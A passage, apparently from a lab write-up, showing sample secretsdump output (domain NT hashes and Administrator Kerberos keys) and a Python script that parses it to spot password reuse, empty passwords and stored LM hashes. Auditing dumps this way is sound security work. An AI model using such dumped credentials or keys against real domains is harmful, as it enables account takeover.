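control.nyx\m.klein:1105:aad3b435b51404eeaad3b435b51404ee:48b20d4f3ea31b7234c92b71c90fbff7:::
control.nyx\d.petrov:1106:aad3b435b51404eeaad3b435b51404ee:48b20d4f3ea31b7234c92b71c90fbff7:::
control.nyx\a.hansen:1107:aad3b435b51404eeaad3b435b51404ee:48b20d4f3ea31b7234c92b71c90fbff7:::
CONTROLER$:1000:aad3b435b51404eeaad3b435b51404ee:97a43247d14c80f991b4e6ccbc61f8be:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9a8c983c709e851258912c3b1d71c9b05faf1724f522b4f32e57f7bef3366773
Administrator:des-cbc-md5:ce9785d980c1a7f8
"""


def parse_secretsdump(text):
    """One dict (domain, user, rid, lm, nt) per NTDS hash line; other lines are ignored."""
    entries = []
    for line in text.splitlines():
        m = NTDS_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["rid"] = int(d["rid"])
            entries.append(d)
    return entries


def reused_nt_hashes(entries):
    """NT hash -> sorted account names, only for hashes held by more than one account."""
    by_hash = defaultdict(list)
    for e in entries:
        by_hash[e["nt"]].append(e["user"])
    return {h: sorted(users) for h, users in by_hash.items() if len(users) > 1}


def empty_password_accounts(entries):
    """Accounts whose NT hash is that of the empty password."""
    return sorted(e["user"] for e in entries if e["nt"] == EMPTY_NT)


def accounts_with_lm_hash(entries):
    """Accounts that still have a real LM hash stored (should be none today)."""
    return sorted(e["user"] for e in entries if e["lm"] != EMPTY_LM)


def machine_accounts(entries):
    """Computer accounts, recognisable by the trailing '$'."""
    return sorted(e["user"] for e in entries if e["user"].endswith("$"))


if __name__ == "__main__":
    entries = parse_secretsdump(SAMPLE)
    print(f"{len(entries)} accounts parsed")
    for h, users in reused_nt_hashes(entries).items():
        print(f"NT hash {h[:8]}... shared by: {', '.join(users)}")
    print("empty password:", empty_password_accounts(entries))
    print("LM hash still stored:", accounts_with_lm_hash(entries))
    print("machine accounts:", machine_accounts(entries))
```

Shared NT hashes are the quickest win in a dump like this: identical hashes mean identical passwords, so the three disabled accounts here were created with the Administrator password. Guest shows the empty-password hash only because the account is disabled; an enabled account in that list would be an immediate finding.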
